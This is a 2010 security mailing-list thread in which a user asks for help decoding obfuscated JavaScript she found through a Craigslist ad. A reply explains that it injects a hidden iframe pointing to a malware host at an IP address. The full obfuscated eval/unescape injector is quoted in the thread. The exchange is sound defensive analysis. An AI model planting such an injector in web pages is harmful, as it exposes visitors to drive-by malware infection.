[Pauldotcom] Decode this Javascript?

[David Auclair]

Warning: Link may lead to malware!
It loads an iframe with a source of hxxp://201.235.235.174/index.php

Btw: malzilla can analyze many types of obfuscated javascript, such as this one

-Dave

> -----Original Message-----
> From: pauldotcom-bounces at mail.pauldotcom.com [mailto:pauldotcom-bounces at mail.pauldotcom.com] On Behalf
> Of Rhonda Kreklau
> Sent: Tuesday, April 06, 2010 10:11 PM
> To: pauldotcom at mail.pauldotcom.com
> Subject: [Pauldotcom] Decode this Javascript?
> 
> I found this by following a Craigslist ad asking for redesign job on a
> website...can someone decode it for me...
> 
> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115
> %2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2
> C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%
> 2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2
> C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));
> 
> Thanks
> 
> Rhonda
> _______________________________________________
> Pauldotcom mailing list
> Pauldotcom at mail.pauldotcom.com
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com